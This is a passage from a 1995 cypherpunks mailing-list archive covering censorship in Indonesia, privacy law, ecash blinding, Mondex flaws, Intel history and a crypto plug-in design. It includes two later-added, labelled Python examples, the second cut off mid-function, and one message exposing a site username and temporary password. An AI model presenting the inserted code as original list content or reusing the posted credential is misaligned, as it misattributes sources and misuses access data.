>   nalists are jailed and unlicensed magazines banned. 

The primary difference between Indonesian and Singaporean censorship
is that the Singaporeans are a lot more urbane about it, and generally
don't have crowds of protestors to shoot at.  Reporting on the East Timor
activity is an especially good way to get kicked out of the country;
I know people it's happened to.  Uncensorable communications can be
a substantial help, though rubber-hose cryptanalysis is still fairly
effective, and it's the type of place that would use it.

A certain amount of US activism on the East Timor problems is Internet-based;
I don't know how connected it is to Indonesia or East Timor, which is
too underdeveloped to be very active on the net, and has the added problem
that activists are heavily watched.

The Indonesian military recruitment process is unfortunately not something
that crypto can affect much, except by keeping political activists' identities
private so they're not targets.  Basically, the draft board knocks on your
door and says "Uncle <whoever> wants _you_", and they're authorized to shoot you
if you don't cooperate, though they're also authorized to not shoot you.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 18 Nov 1995 07:42:01 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <Pine.SUN.3.91.951117154130.3578F-100000@viper.law.miami.edu>
Message-ID: <9511172249.AA09569@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>sorry, but there is a right to remain silent in Europe:

Pity the British Tories do not understand that. Because they brought in
the stupid "right of the prosecution to bring attention to the 
defendant's refusal to answer questions" it probably means that a
very large number of current prosecutions will get sent down in about
three years time. Guess the cost of that!

It was only done because they had nothing else to spout at their conference.
My father (who is a conservative and whose cousin was chairman of the party
until recently) said he felt sick when he saw the conference on TV. Three 
strikes and you are out type stuff... 

Actually there is a set of crimes relating to fraud where there is a 
specific crime of refusal to answer interrogation. They messed this one
up as well. Rather than phrase it that the trustees of a fund have a duty to
account for the whereabouts of the funds at all times when asked they
simply removed the right to silence. Since trustees take on a position
voluntarily I don't see the same problems in requiring them to perform
certain duties (which involve disclosure) as removing their right to 
silence.


I don't think that the right to remain silent would be read in the manner
asserted however. It is a question of refusal to provide material evidence
rather than a refusal to testify.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 18 Nov 1995 07:37:15 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: No Privacy Right in UK ?
In-Reply-To: <199511172025.PAA13462@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951117174809.9898L-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


   
 
Perry, 
 
 
Thanks for your inquiry.  The post "No Privacy Right in UK ?" 
is closely related to cryptography in at least three ways. 
 
 
                           (1) 
 
Cryptography is a means to accomplish an end: privacy. That's 
why the epigraph 
 
         Cypherpunks assume privacy is a good thing
             and wish there were more of it 
 
heads up the post, "No Privacy Right in UK ?" 
 
 
                           (2) 
 
Farther, the case discussed in the post was a prosaic example 
of invasion of privacy by deception.  That the case is ordinary, 
and therefore liable to be lost sight of, makes it all the more 
significant that the largest London daily publicized it; and did 
so in a sympathetic manner.  That helps us here in the United 
States to propagate the importance of the right to privacy.  Cy- 
pherpunks --poetic defenders of privacy (see the epigraph)-- can 
reciprocate the favor by bringing it to people's attention. 
   
Cryptography is not the only means of reversing deceptive inva- 
sions of privacy.  But it is peculiarly suitable for reversing 
some such invasions because it uses deception to ensure, rather 
than invade, privacy.  Thus it can provide a model for the so- 
called prosaic cases: the sting.  For the sting also is designed 
to deceive deceivers, criminal or otherwise.  Privacy is, in part, 
protection from victimization. 
 
 
                           (3) 
 
Further, Clinton attended an elite university in the UK.  Can you 
imagine what notions he may have found attractive there?  Notions 
that can be "encoded" to make them attractive to us here in the 
States; then, if we buy into them, can be "decoded" and...applied! 
 
 
Cordially, 
 
Jim 
 
 
 
INCLOSURE: 
 
On Fri, 17 Nov 1995, Perry E. Metzger wrote:

 
 Could you please explain what this has to do with cryptography?
 
 "James M. Cobb" writes:
  
  11 16 95 The Electronic Telegraph runs a newsstory headed 
  
    Doorstep polish researcher was whiplash injuries spy 
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 18 Nov 1995 07:51:24 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in Indonesia ?
Message-ID: <Pine.BSD.3.91.951117175152.9898M-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
 
                      Cypherpunks assume privacy is a good thing 
                      and wish there were more of it. 
 
                                        --Welcome to cypherpunks 

 
Friend, 
 
 
An 11 17 95 Reuter Information Service newsstory headlined 
 
     Politics, not sex, is Indonesian Internet's concern 
 
reports that 
 
   In Indonesia, the quiet Internet revolution has not gone un- 
   noticed by the armed forces. 
 
Here are more excerpts from the newsstory: 
 
   Armed forces spokesman Brigadier-General Surwarno Adi- 
   wijoyo told Reuters the military had suggested to the com- 
   munications ministry the need for some sort of "toll gate" 
   to "black out" news which could damage culture or affect 
   security. 
 
   It has also suggested registering uses and users, he said. 
 
   ...nobody doubts the military is watching. 
 
   Activists in Indonesia who use the Internet say it is a power- 
   ful tool for distributing information in a society where self- 
   censorship abounds, newspapers are tightly controlled, jour- 
   nalists are jailed and unlicensed magazines banned. 
 
   Internet users doubt the Indonesian government can legis- 
   late or control the Internet, short of pulling the plug on the 
   nation's soon-to-be-privatised phone system. 
 
Please note that the expression "legislate or control" means 
control by either fraud or force, whichever the military finds 
most convenient. 
 
If the military does one day pull the plug, will that validate or 
invalidate the statement in the "Welcome to cypherpunks" document-- 
 
     Cypherpunks know that a widely dispersed system can't 
     be shut down. 
 
A tangential answer is supplied by Indonesian activists: 
 
   Despite the technical and administrative hurdles with cen- 
   soring an increasingly large volume and web of contacts, 
   Internet users point out such a scheme [of censorship, 
   not plug-pulling] would not stop the increasing distribution 
   of material within the country. 
 
For there are private as well as commercial networks in the 
country. 
 
   Commercial providers' estimates suggest there are around 
   10,000 registered local users, with popularity of the 
   Internet growing among Indonesia's technological and edu- 
   cated elite.... 
 
Please note the expression "registered local users," and re- 
call the military's 
 
         suggested registering [of] uses and users 
 
 
Uses?  Perhaps that means those nominally private networks. 

 
 
             Cypherpunks hope that all people desiring privacy 
             will learn how best to defend it. 
 
                                      --Welcome to cypherpunks 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.   NandO News, which posted the above newsstory, 
        can be accessed at: 
 
                       http://www.nando.net 
 
        The story's online filename is: 
 
                          info733_8.html 
 
        It's datelined: 
 
                 JAKARTA (Nov 16, 1995 - 01:06 EST) 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 18 Nov 1995 08:04:51 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in UK ?
In-Reply-To: <Pine.BSD.3.91.951117174809.9898L-100000@ahcbsd1.ovnet.com>
Message-ID: <199511172316.SAA13692@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
> Thanks for your inquiry.  The post "No Privacy Right in UK ?" 
> is closely related to cryptography in at least three ways. 

Actually, I was being rhetorical. It was an inappropriate posting.

> Cryptography is a means to accomplish an end: privacy.

That's true, but it isn't a means to keep private investigators from
noticing that insurance cheats are perfectly healthy when they claim
to be horribly incapacitated, which was what the article was about.

> Farther, the case discussed in the post was a prosaic example 
> of invasion of privacy by deception.

Actually, it was a prosaic example of the lengths to which human
stupidity is taken in our court systems. I'm reminded of the rule that
says you can't put a boobytrap in your home -- after all, a person
breaking and entering could injure themselves with it.

It has nothing to do with cryptography, though.

> Further, Clinton attended an elite university in the UK.  Can you 
> imagine what notions he may have found attractive there?

So what. Nothing to do with cryptography.

Take this elsewhere, I say.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 18 Nov 1995 09:09:02 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511171814.AA23432@alpha>
Message-ID: <4qiqeD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:
> Frederick B. Cohen writes:
>  > This is baloney.  When you work for Netscape or Sun and speak about your
>  > company's products, you are representing the company whether you
>  > disclaim it or not.
>
> Baloney.

Fred is right. I used to work for Goldman Sachs & their internet usage policy
stated that when you write to Internet or Usenet from a GS account, it will
reflect on the firm no matter how you disclaim it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealAudio Welcome Wagon <welcome@realaudio.com>
Date: Sat, 18 Nov 1995 11:48:47 +0800
To: cypherpunks@toad.com
Subject: RealAudio website TEMPORARY PASSWORD
Message-ID: <199511180309.TAA07665@www.realaudio.com>
MIME-Version: 1.0
Content-Type: text/plain


This is an automatic response to your request for a free user account 
on the RealAudio site. Welcome to the world of RealAudio. 

Please do the following:
1. Go to http://www.RealAudio.com/welcome.html
2. Enter the following:

          Username: cpunks 
TEMPORARY Password: New.Norfolk

3. Choose your personal, PERMANENT password for the World of RealAudio

If you have trouble with the software, please refer to
 the RealAudio FAQ and Technical Notes available at
 http://www.RealAudio.com/help.html

You can also contact us through http://www.RealAudio.com/comments.html
Thanks for using RealAudio!
Progressive Networks, Seattle, Washington, USA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 19 Nov 1995 03:17:59 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: NOT CRYPTO RELATED (GET OVER IT)
Message-ID: <Pine.SUN.3.91.951117190659.2884A-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Bay Area S'punks,

Monday, 11/20 5pm Scott Adams, at the Booksmith in San Francisco.
The creator of the  comic starring engineer Dilbert and his dog
Dogbert, will sign his latest book ``It's Obvious You Won't 
Survive by Your Wits Alone.''  1644 Haight St., San Francisco.  
(415) 863-8688.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 1995 12:01:46 +0800
To: cypherpunks@toad.com
Subject: Re: Ecash account
Message-ID: <199511180326.TAA18869@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 Nov 1995 don@cs.byu.edu wrote:

> So who here is going to use their ecash account to set up a money
> lau^H^H^Hexchange service?

Oh boy.  Not this argument again.  The one that says that if someone 
makes "change" that it's money laundering.  *Sigh* I suppose it is, if 
that's the way you're going to look at it.  On that basis, every time I 
go to the corner grocery, I'm "laundering" my money.  So be it.

And I suppose if I put aside a small "nestegg", that then I've got
something to hide as well?? 

> Ob Cyphernoise: Would Dr Fred, Alice, and any other names LD has set up
> for himself lately please keep the noise limited to email? Please?

I too am tired of LD spoofing me.  But I am not going to actively "deny" 
every one of his posts.  It's just not worth it.

Hopefully the people on this list can tell the difference between what I 
stand for, and what certain people would like to paint me as standing for.

As I've said, and repeated, my only interests lie in E-cash, and in
removing code from the Internet which opens up security holes.  Software,
like Netscape Navigator and Java. 

The rest ... or anything else that someone tries to paint me as "standing 
for" is simply juvenile antics. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 03:18:08 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511180330.TAA19479@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject:  Shoe-horning Mondex onto the Internet -- still won't fit



There are many high barriers to the shoe-horning of Mondex onto the Internet:

+ Was not designed for the Internet, rather for physical portable cards
+ Requires expensive hardware: >$100/board for a PC in start-up quantities 
+ According to inside sources, is vulnerable to MITM between payer and payee
+ According to inside sources, is grossly vulnerable to replay attacks 
(offline multi-spending to different parties)
+ The designers have zero experience and reputation in the cryptographic and
computer security communities
+ None of the Mondex designs have been published or peer reviewed.
+ The protocol cannot be published for security reasons, which means
-- Mondex has security holes
-- Customers who defraud Mondex-using banks have legal deniability in a 
court of law: they can simply request banks to produce the security 
protocols as evidence; if they refuse the case is thrown out of 
court (precedent: UK and US phantom-ATM withdrawal cases)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 11:56:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <m0tGdxc-00090gC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>jim bell writes: [re: payee anonymity]
>> It seems to me that this should be possible, within limits, if the potential
>> payee could generate a "blinded" note to be delivered to the payer by
>> anonymous means.  The payer could get the note certified by the bank,
>> possibly given an extra "blind" if necessary  (is this possible? Desirable?
>> Why not?) and then the resulting still-blinded but certified note is posted
>> (in encrypted form, I supposed) to the 'net so that only the payee can
>> decrypt and unblind it.
>
>This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
>dollar bill first." As I understand your protocol, Bob gives Alice an enote,
>then Alice gives Bob an enote. Alice isn't paying Bob in any meaningful sense,
>since Bob ends up with the same amount of e$ with which he started. Perhaps
>you could clarify what you meant.

It sounds like you understand even less about the details of digital cash
than I do.

First, read the August 1992 issue of Scientific American, the article by
David Chaum.  He explains, with a certain amount of detail, how blinded
digital cash operates.  To become validated and worth money, it first has to
be electronically "written," blinded, and then signed by the bank.  Then it
is unblinded, at which point it can be spent.  

What I was saying is that the notes would be written by the payee, then
blinded by the payee, given to the payer, and then signed by the payer's
bank.  At this point, they are worth money, and they are then returned to
the payee, possibly by encrypting them and publishing them in encrypted form
on a publicly-accessible portion of the Internet, so "anyone" could read
them.  Only the intended payee would be able to decrypt them, however, and
only the payee would be able to unblind the notes.
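
[Added example, not part of jim bell's post and not code from any ecash implementation.] The flow described above, with the payee writing and blinding the note and the payer's bank signing it, as a toy RSA blind signature in Python. The key size, the two constructed primes, the function names and the hash-then-reduce note encoding are assumptions for illustration; the encrypted return of the signed note to the payee is left out.

```python
import hashlib
import math
import secrets

# Toy bank key built from two Mersenne primes (constructed for this example,
# far too small and too structured for real use).
P, Q = 2**61 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # bank's private exponent


def note_digest(serial: bytes) -> int:
    """Encode a note's serial number as an integer modulo N (toy encoding)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def payee_write_and_blind():
    """Payee writes a note and blinds it; only `blinded` leaves the payee."""
    serial = secrets.token_bytes(16)
    while True:
        r = secrets.randbelow(N - 2) + 2  # blinding factor, 2 <= r < N
        if math.gcd(r, N) == 1:
            break
    blinded = (note_digest(serial) * pow(r, E, N)) % N
    return serial, r, blinded


def bank_sign(blinded: int) -> int:
    """Payer's bank debits the payer and signs the number it is handed."""
    return pow(blinded, D, N)


def payee_unblind(signed_blinded: int, r: int) -> int:
    """Only the holder of r can strip the blinding factor."""
    return (signed_blinded * pow(r, -1, N)) % N


def verify(serial: bytes, signature: int) -> bool:
    """Anyone with the bank's public key can check a note."""
    return pow(signature, E, N) == note_digest(serial)


def run_flow():
    serial, r, blinded = payee_write_and_blind()   # payee, sent to payer
    signed_blinded = bank_sign(blinded)            # payer has bank sign it
    signature = payee_unblind(signed_blinded, r)   # payee, after return
    return {
        # The unblinded note carries a valid bank signature.
        "spendable": verify(serial, signature),
        # The bank signed without ever seeing the note it will later redeem.
        "bank_saw_note": blinded == note_digest(serial),
        # What the payer holds is a signature on the blinded value only.
        "payer_holds_signature_on_blinded": pow(signed_blinded, E, N) == blinded,
        "payer_copy_spendable": verify(serial, signed_blinded),
    }


if __name__ == "__main__":
    for name, value in run_flow().items():
        print(name, "=", value)
```

Because the payer and the bank see only the blinded value, neither can link the note that is later deposited to this withdrawal, which is the payee anonymity the post is after.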





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 18 Nov 1995 05:13:07 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Corrections about Bob Noyce and Intel
In-Reply-To: <acd204fa000210047be5@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951117192114.9415R-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 Nov 1995, Timothy C. May wrote:

> At 4:55 PM 11/17/95, attila wrote:
> 
> >   2.  most were pioneers: a specific example is Bob Norris who walked
> >       out of a Fairchild board meeting being being rejected for his
> >       eighth try at replacing Germanium because the first seven had
> >       failed. A couple of VCs, among them Arthur Rock and Bob Perring
> >       said: "...we believe you, let's try silicon..." and we have Intel.
> 
	a sign of getting old: blowing names. yes, it is Noyce.

> Bob Noyce was already making silicon devices at Fairchild. The "planar
> process" was developed by him in the late 50s. It is not the case that
> Fairchild was stuck making germanium, nor that Intel was the first to use
> silicon. I could go on about the actual history, but this is far from the
> themes of this list, and many books cover the history very well.
> 
> What Intel pioneered the development of was _silicon-gate MOS_, where the
> aluminum gates of traditional silicon devices is replaced with polysilicon
> gates. Intel did this by hiring the silicon-gate gurus from Fairchild
> (Vadasz, Grove, Faggin, etc.).
>
    you are probably correct, I did not follow the actual technology. I
    do know that from the financial point of view, there had been too many
    failures to justify another large project --yes, that could have been
    the silicon-gate MOS theory.  But there certainly was a parting of the
    ways over funding, to the probable good of the industry since
    Fairchild was already very stodgy. You do need a new, ambitious 
    venture to exploit a new technology --one with a single goal, and
    Intel certainly was that vehicle. 

    The closest I got to Fairchild Semiconductor was when I was consulting
    as a hatchet man to "save" another, newly acquired, Fairchild division
    which had a desperate need for 100K ECL parts which were not really 
    on the market in 1977.  The labs in the old building 2 were in pitiful 
    shape, and that is where 100K ECL had been ostracized --the new
    division's product was hot on the list of then current Fairchild
    president, Cronin, who suffered through my presentation of why I 
    needed $1M plus the 100K lab and fab upgraded --funding for both was
    the same day, not the usual 3-6 months.  Nice corporate jet at the
    time.... :)  and, yes, both projects were _very_ successful.
 
> >       But, who drives Intel today? --Grove, who is labelled as the
> >       founder.  Grove made the _business_ -the brains have been
> >       forgotten. Norris was the darling of the VCs for a couple years
> >       until they figured he couldn't spot a _financial_ success.
> 
> Grove remains a technologist--I studied semiconductor physics from his
> wonderful 1967 book, "The Physics and Technology of Semiconductor
> Devices"--and the group that leads Intel is highly technical. Gordon Moore
> remains connected, materials scientist Craig Barrett (who hired me into
> Intel in '74, ironically) is next-in-line to be President, Gerry Parker is
> a top technologist, and so on.
>
    Grove _was_ a technologist, but his current competitive tactics may 
    have been the tutor for Bill Gates  --or is the other way around? :)
    since Bill is the most effective and feared, even by government, of
    competition by terror tactics ever seen --beats even Cornelius
    Vanderbilt who tried to contain Edison so his gas businesses would not
    suffer --CB _financed_ Edison and then tried to block Edison --who
    then essentially gave NYC the downtown power station, building it in 
    defiance of CB.

    But, even if Edison was the inventor, he was not a visionary: he had
    Tesla, who already had an AC motor, in his employ in the 1880s; they
    parted as Edison would not budge off DC and Tesla sold his AC 
    Technology to George Westinghouse who had a great deal of money from
    his air brakes.  When Tesla received the Niagara Falls power generator
    contract, DC was history and the huge generators Tesla designed are
    still running at the base of the falls --90+ years! 

    The same analysis can be applied to Bob Noyce v. Andrew Grove 
    --Andrew Grove may have been an engineer, but he also became a 
    visionary, as did Bill Gates.

    I have not seen, or had the pleasure of seeing, Gordon Moore for at 
    least 10 years. Yes, he is a technologist; AND, he is a gentleman. 

    I do not know Craig Barrett.  A Barrett presidency may change Intel's
    voracious competitiveness, or it may not.  

> As to Bob Noyce being the "darling of the VCs for a couple of years until
> they figured he couldn't spot a _financial_ success," I should just let
> that one pass. Noyce of course has been dead for several years. When he was
> alive, though, he "spotted" several financial successes.
>
    your history is generally better than mine, Tim, but I will differ on 
    that point. in the 70s and 80s I was consulting to 3-7 of the heavy 
    players at that time in the Sandhill group plus the old guard 
    downtown on high-tech ventures --I always figured I would get the call
    when their fear exceeded their greed.  :) (and so stated by one of
    their own). 

    you may be correct that Bob Noyce hit a couple of winners, but, 
    overall he did just the opposite. as two of the heavies stated over
    lunch one day, "...having Bob Noyce's recommendation became the kiss 
    of death in this town..."  

    Now, granted, the VCs have their own point of view of what a 
    financial success is --after all, they base their views on an
    investment strategy for 10 deals:  1 real winner (not necessarily a 
    NetScape or an Intel, but at least go public with a bang), 3 make
    decent profit, 3 investment returned (or most of it), and 3 dead, or
    close to dead, losses. 

    My objection to the VC financing strategy was that they also took
    personal notes from the startup team and selectively enforced them,
    usually on the pioneers and not the president and comptroller they
    installed as part of the deal; and they have been known to take 
    homes.... 
    
    Today's VC is a far cry from John D. Rockefeller who was vilified in
    his day for his business practices --John D. took 10%, not 51% or more
    plus personal notes. 

    BTW, John D. was the first "big" anti-trust case in the U.S. Ohio 
    drove him out of cleveland to NJ with their anti-trust actions in 
    1890 (or thereabouts) and the U.S. under Teddy "Rough Rider" Roosevelt
    broke him apart nationally in 1909 for his slash and burn tactics.
    Where is Teddy when we need him for Microsoft, not the awestruck 
    Bubba we have as commander and chief.

    I should remember more about John D. and anti-trust than I do, but it 
    is over 30 years since I wrote my senior thesis at Harvard on
    regulation of monopoly. --and age is setting in! :) Yes, I know you
    are retired --hopefully happily with a pension. consultants with blood
    on their hatchets make few friends, and the terms of getting old are
    more like time involuntarily on your hands in So CA's empty economy.
    the hell you say, it's more like one big study and learn time! 
    Knowledge was and still is power!  as long as we have cryptography to 
    protect it.

	Dr. Daniel Flickinger
	 
> --Tim May
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Sat, 18 Nov 1995 11:43:12 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511180319.UAA07399@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: Scott Brickner <sjb@universe.digex.net>
>Date: Thu, 16 Nov 1995 15:13:27 -0600
>Subject: Re: NSA, ITAR, NCSA and plug-in hooks. 

>The problem is that the non-encryption program must use the same
>interface as the encryption program.  Text compression is often cited
>as an example of a non-encryption program that can use the same hooks
>as a compression program, but there's a key difference:  the text
>compressor *doesn't* need a key.
>
>The encryption tool would have an interface like
>    Boolean (*)( DataSource, DataSink, void*);
>
>A compressor written to the same interface would never need to touch
>that third argument.  Therefore, the second argument is "specifically
>designed" to permit an encryption tool to be used.
>
>You'd need a program which not only *accepted* the additional parameter,
>but also *needed* the second parameter.  I confess I have some difficulty
>thinking of one.
>

PKZIP allows encryption (others?).  How about a hook to that?

_____________________________________________________________

"We work in the dark  We do what we can  We give what we have
Our doubt is our passion  And our passion is our task   
The rest is the madness of art."  
                   --Henry James
___________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sat, 18 Nov 1995 12:28:36 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Review: GoldenEye
Message-ID: <199511180406.XAA18908@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just got back from the new Pierce-Brosnan-as-007 flick.
It had a few typical "hacker" stereotypes, and a couple
of interesting crypto relevant references.

* Boris, the stereotypical hacker, was hacking through American
banks.  A screen had the words "Department of Justice" and the
DoJ logo; underneath were the words "Clipper Chip" and a list
of banks.

* The archvillian's plan involved a massive money transfer and
an EMP pulse; he very briefly explained the effects of what
would happen if every computer in London were rendered non-
functional.  Possible crypto-anarchy bits.

* Boris should learn the value of strong passphrases.  His
password for the massive mainframe which will be used in the
archvillain's scheme is a five-letter dictionary word, which
didn't change (and it was used on two different computers),
and he revealed it indirectly (it was a word puzzle).

* A few on-computer-screen references to "encryption".

* Boris and the mastermind kept bantering about "breaking codes."

* Boris' computer in Russia - in his apartment - has a domain
ending in ".comp.math.edu"; when his screen lights up with
the words "INCOMING EMAIL" he goes into a live chat (complete
with graphics).

Above-average action/adventure flick.  The technical mistakes are
forgiveable in the interest of dramatic license.  Don't watch
it for the techno/crypto bits, though.  Watch it because lots
of things blow up :)

Dave----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMK1btCoZzwIn1bdtAQFmOgF/ZLYc3sT1L5sQS+wqmS5U6wsx9jL86job
Ie6DU65FIuSZF6vFDBDNZFxZxs0HuaR6
=5PGz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sat, 18 Nov 1995 16:57:26 +0800
To: cypherpunks@toad.com
Subject: Design proposal: crypto-capable generic interface
Message-ID: <199511180842.AAA06560@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi to cypherpunks who write code,

   The recent discussion of "plug-in" crypto is reminding me of some
design work I did earlier this year. This post presents the motivation
and some of the details of that design, slightly updated.

   First, a few words about what I consider to be a good interface that
can support plug-in crypto. It has to support both email and the Web;
I feel that everything else follows. It should support completely
transparent integration, by which I mean no extra clicking or commands
or anything like that. Finally, it should be generic in that it will
support a number of other plug-in applications besides
cryptography. Two specific applications which interest me are file
format conversions and external-body resolving.

   The design is based partly upon .mailcap, which is perhaps the best
example of a generic interface we have today. However, while .mailcap
is a nice interface for popping up windows to present semi-interesting
multimedia types, it certainly cannot support transparent
cryptography. I feel that its primary weakness is the inability to
support MIME to MIME rewriting. However, .mailcap has some good ideas
which are worth stealing.

   For the purposes of this proposal, I will assume that all objects
are MIME encapsulated. I think that's a reasonable assumption, as it
handily covers all cryptographic protocols that have any hope of
surviving.

   I will propose my design at a very high level. Please forgive me
for leaving out the juicy details.

   I propose that the new interface lives as a sort of daemon, rather
than a static collection of command line script pieces. A reasonable
way for applications to talk to the daemon would be Unix domain
sockets, or whatever the equivalent is on Mac and Windows
platforms. There should be a simple protocol for automatically
starting up a daemon if there isn't one already running.

   The first part of the interface is the negotiation. The daemon
tells the application what MIME types it can understand (this part is
very similar to the .mailcap file, but doesn't include the
corresponding command lines). In reply, the application tells the
daemon what MIME types it can understand (this is like the
Http-Accept: field in HTTP).

   Once the negotiation has been established, the application can send
the daemon MIME objects that the app does not understand but the
daemon does (for example, an image/fractal). The daemon can return a
MIME object that the app does understand (for example, an image/ppm).

   Alternatively, the daemon may request an authentication. This is
useful when resolving external bodies that require authentication,
including non-anonymous FTP, and standard authenticated HTTP. In this
case, the daemon sends a message to the app requesting the
authentication. It specifies whether it needs both username and
password, or just password. In the latter case, it hands a username to
the application.

   The application can then query the user for the authentication
data. It hands this back to the daemon. In reply, the daemon indicates
success or failure. In case of success, it hands the object back to
the app.

   I'm quite pleased with this protocol as outlined. It's fairly
simple, which means it might actually get implemented. It's also easy
to see that it does exactly what you want for file format conversions,
external body resolving, and decryption of encrypted messages.

   Encryption is a bit more tricky, but in essence you just hang a
premail-alike off this kind of protocol. The hard part is specifying
the key, but you just call it a "parameter" and put in hooks for the
daemon to ask for whatever parameters it needs. This requires that
keys have some nonforgeable names, which is unfortunately not a
feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
Certification Authority (<wink> at Nick Szabo).

   One final aside: I've been fairly frustrated with this mailing list
as a forum for talking about real design proposals and implementation
issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
tend to attract far more attention than real crypto work. I want a
forum for, and just for, cypherpunks who write code. If I had just a
smidgen more free time (as if), I'd be trying to start one
myself. Anyone else?

Raph
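
[Added example, not part of Raph Levien's post and not code from premail or any other project.] One way the exchange outlined above could look on the wire: negotiation, a MIME-to-MIME conversion, and a password-only authentication request for an external body, run over a socket pair in Python. The newline-delimited JSON framing, the message names, the converter and the sample URL and credentials are all assumptions constructed for the example; the post leaves those details open.

```python
import hmac
import json
import socket
import threading

# Constructed sample data: one converter the daemon offers and one external
# body that needs a password. None of these names come from the post.
CONVERTERS = {"image/fractal": ("image/ppm", lambda body: "P3 rendering of " + body)}
EXTERNAL = {
    "ftp://ftp.example.org/pub/notes.txt": {
        "username": "demo",
        "password": "constructed-password",
        "object": {"type": "text/plain", "body": "contents of notes.txt"},
    }
}


def channel(sock):
    """Newline-delimited JSON framing (an assumption; the post defines none)."""
    rf = sock.makefile("r", encoding="utf-8")
    wf = sock.makefile("w", encoding="utf-8")

    def send(msg):
        wf.write(json.dumps(msg) + "\n")
        wf.flush()

    def recv():
        line = rf.readline()
        return json.loads(line) if line else None

    return send, recv


def daemon_side(sock):
    send, recv = channel(sock)
    # Negotiation: the daemon says which types it understands, then the
    # application replies with the types it understands.
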